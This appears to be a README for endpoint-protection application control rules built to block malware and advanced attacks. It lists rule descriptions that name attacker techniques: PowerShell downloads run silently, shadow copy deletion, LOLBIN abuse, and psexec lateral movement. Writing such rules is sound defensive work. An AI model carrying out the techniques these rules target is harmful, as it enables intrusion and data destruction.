application control rules which cover most of the malware and ATP detection and protection.
These rules were created after an intence study of discovered advanced attacks which breach organizations.
These rules were implemented in a 5000+ hosts organization up untill version 4.
Thats a diagram that I have made which is the basis on which I am building my rules
******** You should use this rule as TEST (LOG ONLY) at first - it is important to make all the nessasary exceptiosn for your organization ********
3) Each rule that has 0 false positives after a week or so - start changing the rules to "block"
______________________________________________________________________________________________
ATP attack incidents that would fail if they used SEP with these rules:
https://www.scmagazineuk.com/muddywater-apt-campaign-flowing-again-targets-us-near-east/article/750526/ - March 13, 2018
https://www.securityweek.com/china-linked-spies-used-new-malware-uk-government-attack - March 12, 2018
https://www.symantec.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions - 28 Feb, 2018
______________________________________________________________________________________________
RULES:
Protect missuse of user folders
detect UAC change
added more LOLBINS protection
Protect startup entries
prevent vulnerable adobe apps from running SCRIPTS
prevent cmd from launching batch files or scripts
LOG scripts that access documents
prevent cscript and wscript from launching CMD or POWERSHELL
prevent OFFICE apps from launching scripts, hta, cmd, scr, wmic
log office access to executables
prevent browsers from running scripts, cmd
log browsers access to executables
prevent winrm from launching processes or accessing files
prevent powershell from launching regsvr32.exe
prevent procecces from launching powershell with arguments that download files or run in silent, unrestricted and more
prevent proccesses from deleting shadow copies
prevent applications from running scripts from TEMP, APPDATA and more
block known unwanted upplications like utorrent, dameware, lastpass and log cracks, serials and more
block launching of psexec --- (can be done also using IPS by the way to block literal movement)
block some fileless malware from download and execution using powershell
block creation and execution of scripts and executables from common malware related locations
block java from running generic edwind variants